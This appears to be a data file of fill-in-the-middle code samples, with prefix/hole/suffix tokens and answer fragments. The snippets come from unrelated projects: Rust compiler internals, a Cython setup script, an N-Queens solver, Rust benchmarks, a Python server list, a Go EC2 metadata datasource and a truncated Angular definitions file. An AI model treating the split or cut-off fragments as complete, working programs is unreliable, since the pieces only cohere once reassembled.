opcat_eq, ast::BiNe => opcat_eq, ast::BiLt => opcat_rel, ast::BiLe => opcat_rel, ast::BiGe => opcat_rel, ast::BiGt => opcat_rel } } fn tycat(cx: &ctxt, ty: t) -> int { if type_is_simd(cx, ty) { return tycat(cx, simd_type(cx, ty)) } match get(ty).sty { ty_char => tycat_char, ty_bool => tycat_bool, ty_int(_) | ty_uint(_) | ty_infer(IntVar(_)) => tycat_int, ty_float(_) | ty_infer(FloatVar(_)) => tycat_float, ty_bot => tycat_bot, ty_ptr(_) => tycat_raw_ptr, _ => tycat_other } } static t: bool = true; static f: bool = false; let tbl = [ // +, -, *, shift, rel, ==, bit, logic /*other*/ [f, f, f, f, f, f, f, f], /*bool*/ [f, f, f, f, t, t, t, t], /*char*/ [f, f, f, f, t, t, f, f], /*int*/ [t, t, t, t, t, t, t, f], /*float*/ [t, t, t, f, t, t, f, f], /*bot*/ [t, t, t, t, t, t, t, t], 
/*raw ptr*/ [f, f, f, f, t, t, f, f]]; return tbl[tycat(cx, ty)][opcat(op)]; } pub fn ty_params_to_tys(tcx: &ctxt, generics: &ast::Generics) -> Vec<t> { Vec::from_fn(generics.ty_params.len(), |i| { let id = generics.ty_params.get(i).id; ty::mk_param(tcx, i, ast_util::local_def(id)) }) } /// Returns an equivalent type with all the typedefs and self regions removed. pub fn normalize_ty(cx: &ctxt, t: t) -> t { let u = TypeNormalizer(cx).fold_ty(t); return u; struct TypeNormalizer<'a>(&'a ctxt); impl<'a> TypeFolder for TypeNormalizer<'a> { fn tcx<'a>(&'a self) -> &'a ctxt { let TypeNormalizer(c) = *self; c } fn fold_ty(&mut self, t: ty::t) -> ty::t { match self.tcx().normalized_cache.borrow().find_copy(&t) { None => {} Some(u) => return u } let t_norm = ty_fold::super_fold_ty(self, t); self.tcx().normalized_cache.borrow_mut().insert(t, t_norm); return t_norm; } fn fold_vstore(&mut self, vstore: vstore) -> vstore { match vstore { vstore_fixed(..) | vstore_uniq => vstore, vstore_slice(_) => vstore_slice(ReStatic) } } fn fold_region(&mut self, _: ty::Region) -> ty::Region { ty::ReStatic } fn fold_substs(&mut self, substs: &substs) -> substs { substs { regions: ErasedRegions, self_ty: ty_fold::fold_opt_ty(self, substs.self_ty), tps: ty_fold::fold_ty_vec(self, substs.tps.as_slice()) } } fn fold_sig(&mut self, sig: &ty::FnSig) -> ty::FnSig { // The binder-id is only relevant to bound regions, which // are erased at trans time. ty::FnSig { binder_id: ast::DUMMY_NODE_ID, inputs: ty_fold::fold_ty_vec(self, sig.inputs.as_slice()), output: self.fold_ty(sig.output), variadic: sig.variadic, } } } } pub trait ExprTyProvider { fn expr_ty(&self, ex: &ast::Expr) -> t; fn ty_ctxt<'a>(&'a self) -> &'a ctxt; } impl ExprTyProvider for ctxt { fn expr_ty(&self, ex: &ast::Expr) -> t { expr_ty(self, ex) } fn ty_ctxt<'a>(&'a self) -> &'a ctxt { self } } // Returns the repeat count for a repeating vector expression. pub fn eval_repeat_count<T: ExprTyProvider>(tcx: &T, count_expr: &ast::Expr) -> uint { match const_eval::eval_const_expr_partial(tcx, count_expr) { Ok(ref const_val) => match *const_val { const_eval::const_int(count) => if count < 0 { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found negative integer"); return 0; } else { return count as uint }, const_eval::const_uint(count) => return count as uint, const_eval::const_float(count) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found float"); return count as uint; } const_eval::const_str(_) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found string"); return 0; } const_eval::const_bool(_) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found boolean"); return 0; } const_eval::const_binary(_) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found binary array"); return 0; } }, Err(..) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected constant integer for repeat count \ but found variable"); return 0; } } } // Determine what purity to check a nested function under pub fn determine_inherited_purity(parent: (ast::Purity, ast::NodeId), child: (ast::Purity, ast::NodeId), child_sigil: ast::Sigil) -> (ast::Purity, ast::NodeId) { // If the closure is a stack closure and hasn't had some non-standard // purity inferred for it, then check it under its parent's purity. 
// Otherwise, use its own match child_sigil { ast::BorrowedSigil if child.val0() == ast::ImpureFn => parent, _ => child } } // Iterate over a type parameter's bounded traits and any supertraits // of those traits, ignoring kinds. // Here, the supertraits are the transitive closure of the supertrait // relation on the supertraits from each bounded trait's constraint // list. pub fn each_bound_trait_and_supertraits(tcx: &ctxt, bounds: &[@TraitRef], f: |@TraitRef| -> bool) -> bool { for &bound_trait_ref in bounds.iter() { let mut supertrait_set = HashMap::new(); let mut trait_refs = Vec::new(); let mut i = 0; // Seed the worklist with the trait from the bound supertrait_set.insert(bound_trait_ref.def_id, ()); trait_refs.push(bound_trait_ref); // Add the given trait ty to the hash map while i < trait_refs.len() { debug!("each_bound_trait_and_supertraits(i={:?}, trait_ref={})", i, trait_refs.get(i).repr(tcx)); if !f(*trait_refs.get(i)) { return false; } // Add supertraits to supertrait_set let supertrait_refs = trait_ref_supertraits(tcx, *trait_refs.get(i)); for &supertrait_ref in supertrait_refs.iter() { debug!("each_bound_trait_and_supertraits(supertrait_ref={})", supertrait_ref.repr(tcx)); let d_id = supertrait_ref.def_id; if !supertrait_set.contains_key(&d_id) { // FIXME(#5527) Could have same trait multiple times supertrait_set.insert(d_id, ()); trait_refs.push(supertrait_ref); } } i += 1; } } return true; } pub fn count_traits_and_supertraits(tcx: &ctxt, type_param_defs: &[TypeParameterDef]) -> uint { let mut total = 0; for type_param_def in type_param_defs.iter() { each_bound_trait_and_supertraits( tcx, type_param_def.bounds.trait_bounds.as_slice(), |_| { total += 1; true }); } return total; } pub fn get_tydesc_ty(tcx: &ctxt) -> Result<t, ~str> { tcx.lang_items.require(TyDescStructLangItem).map(|tydesc_lang_item| { tcx.intrinsic_defs.borrow().find_copy(&tydesc_lang_item) .expect("Failed to resolve TyDesc") }) } pub fn get_opaque_ty(tcx: &ctxt) -> Result<t, ~str> { tcx.lang_items.require(OpaqueStructLangItem).map(|opaque_lang_item| { tcx.intrinsic_defs.borrow().find_copy(&opaque_lang_item) .expect("Failed to resolve Opaque") }) } pub fn visitor_object_ty(tcx: &ctxt, region: ty::Region) -> Result<(@TraitRef, t), ~str> { let trait_lang_item = match tcx.lang_items.require(TyVisitorTraitLangItem) { Ok(id) => id, Err(s) => { return Err(s); } }; let substs = substs { regions: ty::NonerasedRegions(OwnedSlice::empty()), self_ty: None, tps: Vec::new() }; let trait_ref = @TraitRef { def_id: trait_lang_item, substs: substs }; Ok((trait_ref, mk_trait(tcx, trait_ref.def_id, trait_ref.substs.clone(), RegionTraitStore(region), ast::MutMutable, EmptyBuiltinBounds()))) } pub fn item_variances(tcx: &ctxt, item_id: ast::DefId) -> @ItemVariances { lookup_locally_or_in_crate_store( "item_variance_map", item_id, &mut *tcx.item_variance_map.borrow_mut(), || @csearch::get_item_variances(&tcx.sess.cstore, item_id)) } /// Records a trait-to-implementation mapping. 
fn record_trait_implementation(tcx: &ctxt, trait_def_id: DefId, implementation: @Impl) { let implementation_list; let mut trait_impls = tcx.trait_impls.borrow_mut(); match trait_impls.find(&trait_def_id) { None => { implementation_list = @RefCell::new(Vec::new()); trait_impls.insert(trait_def_id, implementation_list); } Some(&existing_implementation_list) => { implementation_list = existing_implementation_list } } implementation_list.borrow_mut().push(implementation); } /// Populates the type context with all the implementations for the given type /// if necessary. pub fn populate_implementations_for_type_if_necessary(tcx: &ctxt, type_id: ast::DefId) { if type_id.krate == LOCAL_CRATE { return } if tcx.populated_external_types.borrow().contains(&type_id) { return } csearch::each_implementation_for_type(&tcx.sess.cstore, type_id, |implementation_def_id| { let implementation = @csearch::get_impl(tcx, implementation_def_id); // Record the trait->implementation mappings, if applicable. let associated_traits = csearch::get_impl_trait(tcx, implementation.did); for trait_ref in associated_traits.iter() { record_trait_implementation(tcx, trait_ref.def_id, implementation); } // For any methods that use a default implementation, add them to // the map. This is a bit unfortunate. for method in implementation.methods.iter() { for source in method.provided_source.iter() { tcx.provided_method_sources.borrow_mut() .insert(method.def_id, *source); } } // If this is an inherent implementation, record it. if associated_traits.is_none() { let implementation_list; let mut inherent_impls = tcx.inherent_impls.borrow_mut(); match inherent_impls.find(&type_id) { None => { implementation_list = @RefCell::new(Vec::new()); inherent_impls.insert(type_id, implementation_list); } Some(&existing_implementation_list) => { implementation_list = existing_implementation_list; } } implementation_list.borrow_mut().push(implementation); } // Store the implementation info. tcx.impls.borrow_mut().insert(implementation_def_id, implementation); }); tcx.populated_external_types.borrow_mut().insert(type_id); } /// Populates the type context with all the implementations for the given /// trait if necessary. pub fn populate_implementations_for_trait_if_necessary( tcx: &ctxt, trait_id: ast::DefId) { if trait_id.krate == LOCAL_CRATE { return } if tcx.populated_external_traits.borrow().contains(&trait_id) { return } csearch::each_implementation_for_trait(&tcx.sess.cstore, trait_id, |implementation_def_id| { let implementation = @csearch::get_impl(tcx, implementation_def_id); // Record the trait->implementation mapping. record_trait_implementation(tcx, trait_id, implementation); // For any methods that use a default implementation, add them to // the map. This is a bit unfortunate. for method in implementation.methods.iter() { for source in method.provided_source.iter() { tcx.provided_method_sources.borrow_mut() .insert(method.def_id, *source); } } // Store the implementation info. tcx.impls.borrow_mut().insert(implementation_def_id, implementation); }); tcx.populated_external_traits.borrow_mut().insert(trait_id); } /// Given the def_id of an impl, return the def_id of the trait it implements. /// If it implements no trait, return `None`. 
pub fn trait_id_of_impl(tcx: &ctxt, def_id: ast::DefId) -> Option<ast::DefId> { let node = match tcx.map.find(def_id.node) { Some(node) => node, None => return None }; match node { ast_map::NodeItem(item) => { match item.node { ast::ItemImpl(_, Some(ref trait_ref), _, _) => { Some(node_id_to_trait_ref(tcx, trait_ref.ref_id).def_id) } _ => None } } _ => None } } /// If the given def ID describes a method belonging to a trait (either a /// default method or an implementation of a trait method), return the ID of /// the trait that the method belongs to. Otherwise, return `None`. pub fn trait_of_method(tcx: &ctxt, def_id: ast::DefId) -> Option<ast::DefId> { if def_id.krate != LOCAL_CRATE { return csearch::get_trait_of_method(&tcx.sess.cstore, def_id, tcx); } match tcx.methods.borrow().find(&def_id).map(|m| *m) { Some(method) => { match method.container { TraitContainer(def_id) => Some(def_id), ImplContainer(def_id) => trait_id_of_impl(tcx, def_id), } } None => None } } /// If the given def ID describes a method belonging to a trait, (either a /// default method or an implementation of a trait method), return the ID of /// the method inside trait definition (this means that if the given def ID /// is already that of the original trait method, then the return value is /// the same). /// Otherwise, return `None`. pub fn trait_method_of_method(tcx: &ctxt, def_id: ast::DefId) -> Option<ast::DefId> { let method = match tcx.methods.borrow().find(&def_id) { Some(&m) => m, None => return None, }; let name = method.ident.name; match trait_of_method(tcx, def_id) { Some(trait_did) => { let trait_methods = ty::trait_methods(tcx, trait_did); trait_methods.iter() .position(|m| m.ident.name == name) .map(|idx| ty::trait_method(tcx, trait_did, idx).def_id) } None => None } } /// Creates a hash of the type `t` which will be the same no matter what crate /// context it's calculated within. This is used by the `type_id` intrinsic. pub fn hash_crate_independent(tcx: &ctxt, t: t, svh: &Svh) -> u64 { let mut state = sip::SipState::new(); macro_rules! byte( ($b:expr) => { ($b as u8).hash(&mut state) } ); macro_rules! hash( ($e:expr) => { $e.hash(&mut state) } ); let region = |_state: &mut sip::SipState, r: Region| { match r { ReStatic => {} ReEmpty | ReEarlyBound(..) | ReLateBound(..) | ReFree(..) | ReScope(..) | ReInfer(..) 
=> { tcx.sess.bug("non-static region found when hashing a type") } } }; let vstore = |state: &mut sip::SipState, v: vstore| { match v { vstore_fixed(_) => 0u8.hash(state), vstore_uniq => 1u8.hash(state), vstore_slice(r) => { 2u8.hash(state); region(state, r); } } }; let did = |state: &mut sip::SipState, did: DefId| { let h = if ast_util::is_local(did) { svh.clone() } else { tcx.sess.cstore.get_crate_hash(did.krate) }; h.as_str().hash(state); did.node.hash(state); }; let mt = |state: &mut sip::SipState, mt: mt| { mt.mutbl.hash(state); }; ty::walk_ty(t, |t| { match ty::get(t).sty { ty_nil => byte!(0), ty_bot => byte!(1), ty_bool => byte!(2), ty_char => byte!(3), ty_int(i) => { byte!(4); hash!(i); } ty_uint(u) => { byte!(5); hash!(u); } ty_float(f) => { byte!(6); hash!(f); } ty_str(v) => { byte!(7); hash!(v); } ty_enum(d, _) => { byte!(8); hash!(d) } ty_box(_) => { byte!(9); } ty_uniq(_) => { byte!(10); } ty_vec(m, v) => { byte!(11); mt(&mut state, m); vstore(&mut state, v); } ty_ptr(m) => { byte!(12); mt(&mut state, m); } ty_rptr(r, m) => { byte!(13); region(&mut state, r); mt(&mut state, m); } ty_bare_fn(ref b) => { byte!(14); hash!(b.purity); hash!(b.abis); } ty_closure(ref c) => { byte!(15); hash!(c.purity); hash!(c.sigil); hash!(c.onceness); hash!(c.bounds); region(&mut state, c.region); } ty_trait(~ty::TyTrait { def_id: d, store, mutability: m, bounds, .. }) => { byte!(17); did(&mut state, d); match store { UniqTraitStore => byte!(0), RegionTraitStore(r) => { byte!(1) region(&mut state, r); } } hash!(m); hash!(bounds); } ty_struct(d, _) => { byte!(18); did(&mut state, d); } ty_tup(ref inner) => { byte!(19); hash!(inner.len()); } ty_param(p) => { byte!(20); hash!(p.idx); did(&mut state, p.def_id); } ty_self(d) => { byte!(21); did(&mut state, d); } ty_infer(_) => unreachable!(), ty_err => byte!(23), ty_unboxed_vec(m) => { byte!(24); mt(&mut state, m); } } }); state.result() } impl Variance { pub fn to_str(self) -> &'static str { match self { Covariant => "+", Contravariant => "-", Invariant => "o", Bivariant => "*", } } } pub fn construct_parameter_environment( tcx: &ctxt, self_bound: Option<@TraitRef>, item_type_params: &[TypeParameterDef], method_type_params: &[TypeParameterDef], item_region_params: &[RegionParameterDef], method_region_params: &[RegionParameterDef], free_id: ast::NodeId) -> ParameterEnvironment { /*! See `ParameterEnvironment` struct def'n for details */ // // Construct the free substs. 
// // map Self => Self let self_ty = self_bound.map(|t| ty::mk_self(tcx, t.def_id)); // map A => A let num_item_type_params = item_type_params.len(); let num_method_type_params = method_type_params.len(); let num_type_params = num_item_type_params + num_method_type_params; let type_params = Vec::from_fn(num_type_params, |i| { let def_id = if i < num_item_type_params { item_type_params[i].def_id } else { method_type_params[i - num_item_type_params].def_id }; ty::mk_param(tcx, i, def_id) }); // map bound 'a => free 'a let region_params = { fn push_region_params(mut accum: Vec<ty::Region>, free_id: ast::NodeId, region_params: &[RegionParameterDef]) -> Vec<ty::Region> { for r in region_params.iter() { accum.push( ty::ReFree(ty::FreeRegion { scope_id: free_id, bound_region: ty::BrNamed(r.def_id, r.name)})); } accum } let t = push_region_params(vec!(), free_id, item_region_params); push_region_params(t, free_id, method_region_params) }; let free_substs = substs { self_ty: self_ty, tps: type_params, regions: ty::NonerasedRegions(OwnedSlice::from_vec(region_params)) }; // // Compute the bounds on Self and the type parameters. // let self_bound_substd = self_bound.map(|b| b.subst(tcx, &free_substs)); let type_param_bounds_substd = Vec::from_fn(num_type_params, |i| { if i < num_item_type_params { (*item_type_params[i].bounds).subst(tcx, &free_substs) } else { let j = i - num_item_type_params; (*method_type_params[j].bounds).subst(tcx, &free_substs) } }); debug!("construct_parameter_environment: free_id={} \ free_subst={} \ self_param_bound={} \ type_param_bound={}", free_id, free_substs.repr(tcx), self_bound_substd.repr(tcx), type_param_bounds_substd.repr(tcx)); ty::ParameterEnvironment { free_substs: free_substs, self_param_bound: self_bound_substd, type_param_bounds: type_param_bounds_substd, } } impl substs { pub fn empty() -> substs { substs { self_ty: None, tps: Vec::new(), regions: NonerasedRegions(OwnedSlice::empty()) } } } impl BorrowKind { pub fn from_mutbl(m: ast::Mutability) -> BorrowKind { match m { ast::MutMutable => MutBorrow, ast::MutImmutable => ImmBorrow, } } pub fn to_user_str(&self) -> &'static str { match *self { MutBorrow => "mutable", ImmBorrow => "immutable", UniqueImmBorrow => "uniquely immutable", } } pub fn to_short_str(&self) -> &'static str { match *self { MutBorrow => "mut", ImmBorrow => "imm", UniqueImmBorrow => "own", } } }<|fim▁end|>
enum_variants(cx, id).iter().map(|variant_info| { let substd_args = variant_info.args.iter()
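
Every row in this dump follows the same fill-in-the-middle layout: the prompt is prefix + <|fim▁hole|> + suffix + <|fim▁end|>, and the completion on the following line is the text that belongs in the hole (the Rust row above stitches back into rustc's ty.rs this way). A minimal Python sketch of that reconstruction; the token spellings are copied from the rows themselves, while the function is an assumed downstream consumer, not part of the dataset:

# Rebuild the original source text from one (prompt, completion) row.
BEGIN = "<|fim▁begin|>"
HOLE = "<|fim▁hole|>"
END = "<|fim▁end|>"

def stitch(prompt, completion):
    body = prompt.split(BEGIN, 1)[1]    # drop the <|file_name|> header
    prefix, rest = body.split(HOLE, 1)
    suffix = rest.split(END, 1)[0]
    return prefix + completion + suffix
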
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from distutils.core import setup from distutils.extension import Extension from Cython.Distutils import build_ext setup( cmdclass = {'build_ext' : build_ext}, ext_modules=[Extension("_snaphu", sources=["_snaphu.pyx", "../src/snaphu.c", "../src/snaphu_solver.c", "../src/snaphu_util.c", "../src/snaphu_cost.c", "../src/snaphu_cs2.c", "../src/snaphu_io.c", "../src/snaphu_tile.c"],<|fim▁hole|> include_dirs=['../src'], extra_compile_args=['-Wstrict-prototypes', ], language="c")] )<|fim▁end|>
<|file_name|>n_queens.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# encoding: utf-8

"""
n_queens.py

Created by Shengwei on 2014-07-23.
"""

import math  # needed below for int(math.log(pos, 2))

# https://oj.leetcode.com/problems/n-queens/
# tags: medium / hard, matrix, bit manipulation, generator, dfs, edge cases, bitmap

"""
The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.

Given an integer n, return all distinct solutions to the n-queens puzzle.

Each solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' both indicate a queen and an empty space respectively.

For example,
There exist two distinct solutions to the 4-queens puzzle:

[
 [".Q..", // Solution 1
  "...Q",
  "Q...",
  "..Q."],

 ["..Q.", // Solution 2
  "Q...",
  "...Q",
  ".Q.."]
]
"""

# https://oj.leetcode.com/discuss/3861/solved-with-backtracing
# https://oj.leetcode.com/discuss/743/whats-your-solution

class Solution:
    # @return a list of lists of string
    def solveNQueens(self, n):
        positions = (1 << n) - 1

        def search(board, depth, vertical_taken, left_taken, right_taken):
            if depth == 0:
                yield board
                return

            line = ['.'] * n
            # it must be & with positions, otherwise it's a negative number
            # with all 1's extending to the leftmost bit
            availables = positions & ~(vertical_taken | left_taken | right_taken)

            # loop through all the availables at this depth
            while availables:
                pos = availables & (-availables)  # get the rightmost bit that is 1<|fim▁hole|>
                line[index] = 'Q'

                for each in search(
                        board + [''.join(line)], depth - 1,
                        vertical_taken + pos,
                        left_taken + pos << 1,
                        right_taken + pos >> 1):
                    yield each

                line[index] = '.'

        return list(search([], n, 0, 0, 0))<|fim▁end|>
availables -= pos    # remove current pos from availables
                index = int(math.log(pos, 2))   # compute the index where to put the queen
                # note: remember the recursive call is an iterator and must be yielded from again
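
Two bit tricks carry the n_queens row: availables & (-availables) isolates the lowest set bit (a two's-complement identity), and log2 of that one-hot value is the column index. A small self-contained check of both, with pos.bit_length() - 1 as an exact integer alternative to the float log; the sample masks are arbitrary:

import math

for availables in (0b10110, 0b01000, 0b1):
    pos = availables & (-availables)        # only the lowest set bit survives the AND
    index = int(math.log(pos, 2))           # column index, as in the row above
    assert index == pos.bit_length() - 1    # integer-only equivalent, no float rounding
    print(bin(availables), "->", bin(pos), "index", index)
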
<|file_name|>verify_numbers.rs<|end_file_name|><|fim▁begin|>#![feature(test)] extern crate mynumber; extern crate test; #[bench] fn bench_verify_individual_number(b: &mut test::Bencher) { b.iter(|| { let number = "123456789018"; assert!(mynumber::individual::verify(number).is_ok());<|fim▁hole|> #[bench] fn bench_verify_corporate_number(b: &mut test::Bencher) { b.iter(|| { let number = "9234567890123"; assert!(mynumber::corporate::verify(number).is_ok()); }); }<|fim▁end|>
}); }
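
The Rust row benches two validators by handing test::Bencher a closure that it runs many times. For readers who want the same shape outside Rust, a rough Python analogue with timeit; validate here is a made-up stand-in for mynumber's verify functions, not their real check-digit algorithm:

import timeit

def validate(number):
    # Hypothetical placeholder: cheap, deterministic work to time.
    return len(number) == 12 and number.isdigit()

# Like b.iter(|| ...): run the closure repeatedly and report elapsed time.
elapsed = timeit.timeit(lambda: validate("123456789018"), number=100000)
print("%.4fs for 100k calls" % elapsed)
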
<|file_name|>serverList.py<|end_file_name|><|fim▁begin|>#| This file is part of pyCAF.                                          |
#|                                                                      |
#| pyCAF is free software: you can redistribute it and/or modify        |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or    |
#| (at your option) any later version.                                  |
#|                                                                      |
#| pyCAF is distributed in the hope that it will be useful,             |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of       |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the         |
#| GNU General Public License for more details.                         |
#|                                                                      |
#| You should have received a copy of the GNU General Public License    |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
# -*- coding: utf-8 -*-

class ServerList():
    """
    Class which creates a list of servers.
    This class uses a dictionary, and an ident number is given to each server added.
    The user can get a server by printing the list and picking out the ident value.
    Example :
    >>print myServerList
    ServerAlpha Id : 1
    ServerBeta Id : 2
    >>s = myServerList.get_server(2)
    >>print s.name
    ServerBeta
    """
    def __init__(self):
        self.dict = {}
        self.counter = 0

    def add_server(self, server):
        """
        Add a server to the server dictionary.
        Dictionary model : [counter, server]
        @param server : the server to store
        """
        self.counter += 1
        self.dict[self.counter] = server

    def get_server(self, ident):
        """
        Return the server corresponding to the ident value.
        @param ident : the number corresponding to the server
        """
        if ident in self.dict.keys():
            return self.dict[ident]
        else:
            print "Server not found"

    def __str__(self):
        """
        Print the list of servers with their ident value<|fim▁hole|>
            print "{}".format(server),
            print identityNb
        return ""<|fim▁end|>
""" # print self.label_interface_list() for identityNb, server in self.dict.items():
<|file_name|>metadata.go<|end_file_name|><|fim▁begin|>// Copyright 2015 CoreOS, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package ec2 import ( "bufio" "bytes" "fmt" "log" "net" "strings" "github.com/rancher/os/netconf" "github.com/rancher/os/config/cloudinit/datasource" "github.com/rancher/os/config/cloudinit/datasource/metadata" "github.com/rancher/os/config/cloudinit/pkg" ) const ( DefaultAddress = "http://169.254.169.254/" apiVersion = "latest/" userdataPath = apiVersion + "user-data/" metadataPath = apiVersion + "meta-data/" ) type MetadataService struct { metadata.Service } func NewDatasource(root string) *MetadataService { if root == "" { root = DefaultAddress } return &MetadataService{metadata.NewDatasource(root, apiVersion, userdataPath, metadataPath, nil)} } func (ms MetadataService) AvailabilityChanges() bool { // TODO: if it can't find the network, maybe we can start it? return false } func (ms MetadataService) FetchMetadata() (datasource.Metadata, error) { // see http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html metadata := datasource.Metadata{} metadata.NetworkConfig = netconf.NetworkConfig{} if keynames, err := ms.fetchAttributes("public-keys"); err == nil { keyIDs := make(map[string]string) for _, keyname := range keynames { tokens := strings.SplitN(keyname, "=", 2) if len(tokens) != 2 { return metadata, fmt.Errorf("malformed public key: %q", keyname) } keyIDs[tokens[1]] = tokens[0] } metadata.SSHPublicKeys = map[string]string{} for name, id := range keyIDs { sshkey, err := ms.fetchAttribute(fmt.Sprintf("public-keys/%s/openssh-key", id)) if err != nil { return metadata, err } metadata.SSHPublicKeys[name] = sshkey log.Printf("Found SSH key for %q\n", name) } } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } if hostname, err := ms.fetchAttribute("hostname"); err == nil { metadata.Hostname = strings.Split(hostname, " ")[0] } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } // TODO: these are only on the first interface - it looks like you can have as many as you need... 
if localAddr, err := ms.fetchAttribute("local-ipv4"); err == nil { metadata.PrivateIPv4 = net.ParseIP(localAddr) } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } if publicAddr, err := ms.fetchAttribute("public-ipv4"); err == nil { metadata.PublicIPv4 = net.ParseIP(publicAddr) } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } metadata.NetworkConfig.Interfaces = make(map[string]netconf.InterfaceConfig) if macs, err := ms.fetchAttributes("network/interfaces/macs"); err != nil { for _, mac := range macs { if deviceNumber, err := ms.fetchAttribute(fmt.Sprintf("network/interfaces/macs/%s/device-number", mac)); err != nil { network := netconf.InterfaceConfig{ DHCP: true, } /* Looks like we must use DHCP for aws // private ipv4 if subnetCidrBlock, err := ms.fetchAttribute(fmt.Sprintf("network/interfaces/macs/%s/subnet-ipv4-cidr-block", mac)); err != nil { cidr := strings.Split(subnetCidrBlock, "/") if localAddr, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/local-ipv4s", mac)); err != nil { for _, addr := range localAddr { network.Addresses = append(network.Addresses, addr+"/"+cidr[1]) } } } // ipv6 if localAddr, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/ipv6s", mac)); err != nil { if subnetCidrBlock, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/subnet-ipv6-cidr-block", mac)); err != nil { for i, addr := range localAddr { cidr := strings.Split(subnetCidrBlock[i], "/") network.Addresses = append(network.Addresses, addr+"/"+cidr[1]) } } } */ // disabled - it looks to me like you don't actually put the public IP on the eth device /* if publicAddr, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/public-ipv4s", mac)); err != nil { if vpcCidrBlock, err := ms.fetchAttribute(fmt.Sprintf("network/interfaces/macs/%s/vpc-ipv4-cidr-block", mac)); err != nil { cidr := strings.Split(vpcCidrBlock, "/") network.Addresses = append(network.Addresses, publicAddr+"/"+cidr[1]) } } */ metadata.NetworkConfig.Interfaces["eth"+deviceNumber] = network } } } return metadata, nil } func (ms MetadataService) Type() string { return "ec2-metadata-service" } func (ms MetadataService) fetchAttributes(key string) ([]string, error) { url := ms.MetadataURL() + key resp, err := ms.FetchData(url) if err != nil { return nil, err } scanner := bufio.NewScanner(bytes.NewBuffer(resp)) data := make([]string, 0) for scanner.Scan() { data = append(data, scanner.Text()) }<|fim▁hole|> func (ms MetadataService) fetchAttribute(key string) (string, error) { attrs, err := ms.fetchAttributes(key) if err == nil && len(attrs) > 0 { return attrs[0], nil } return "", err }<|fim▁end|>
return data, scanner.Err() }
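
fetchAttributes/fetchAttribute in the Go row reduce to HTTP GETs against the link-local metadata service, split into lines. A hedged Python equivalent, assuming the IMDSv1 endpoint and latest/meta-data/ path shown in the row; it only returns data when run on an actual EC2 instance:

import urllib.request

BASE = "http://169.254.169.254/latest/meta-data/"

def fetch_attributes(key):
    # One GET per key; the service answers with newline-separated values.
    with urllib.request.urlopen(BASE + key, timeout=2) as resp:
        return resp.read().decode().splitlines()

def fetch_attribute(key):
    # Single-valued keys such as "hostname" or "local-ipv4".
    values = fetch_attributes(key)
    return values[0] if values else ""
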
<|file_name|>definitions.ts<|end_file_name|><|fim▁begin|>/** * @license * Copyright Google LLC All Rights Reserved. * * Use of this source code is governed by an MIT-style license that can be * found in the LICENSE file at https://angular.io/license */ import {AST, TmplAstBoundAttribute, TmplAstBoundEvent, TmplAstElement, TmplAstNode, TmplAstTemplate, TmplAstTextAttribute} from '@angular/compiler'; import {NgCompiler} from '@angular/compiler-cli/src/ngtsc/core'; import {isExternalResource} from '@angular/compiler-cli/src/ngtsc/metadata'; import {DirectiveSymbol, DomBindingSymbol, ElementSymbol, ShimLocation, Symbol, SymbolKind, TemplateSymbol} from '@angular/compiler-cli/src/ngtsc/typecheck/api'; import * as ts from 'typescript'; import {getTargetAtPosition, TargetNodeKind} from './template_target'; import {findTightestNode, getParentClassDeclaration} from './ts_utils'; import {flatMap, getDirectiveMatchesForAttribute, getDirectiveMatchesForElementTag, getTemplateInfoAtPosition, getTextSpanOfNode, isDollarEvent, isTypeScriptFile, TemplateInfo, toTextSpan} from './utils'; interface DefinitionMeta { node: AST|TmplAstNode; parent: AST|TmplAstNode|null; symbol: Symbol; } interface HasShimLocation { shimLocation: ShimLocation; } export class DefinitionBuilder { constructor(private readonly tsLS: ts.LanguageService, private readonly compiler: NgCompiler) {} getDefinitionAndBoundSpan(fileName: string, position: number): ts.DefinitionInfoAndBoundSpan |undefined { const templateInfo = getTemplateInfoAtPosition(fileName, position, this.compiler); if (templateInfo === undefined) { // We were unable to get a template at the given position. If we are in a TS file, instead // attempt to get an Angular definition at the location inside a TS file (examples of this // would be templateUrl or a url in styleUrls). if (!isTypeScriptFile(fileName)) { return; } return getDefinitionForExpressionAtPosition(fileName, position, this.compiler); } const definitionMetas = this.getDefinitionMetaAtPosition(templateInfo, position); if (definitionMetas === undefined) { return undefined; } const definitions: ts.DefinitionInfo[] = []; for (const definitionMeta of definitionMetas) { // The `$event` of event handlers would point to the $event parameter in the shim file, as in // `_outputHelper(_t3["x"]).subscribe(function ($event): any { $event }) ;` // If we wanted to return something for this, it would be more appropriate for something like // `getTypeDefinition`. if (isDollarEvent(definitionMeta.node)) { continue; } definitions.push( ...(this.getDefinitionsForSymbol({...definitionMeta, ...templateInfo}) ?? [])); } if (definitions.length === 0) { return undefined; } return {definitions, textSpan: 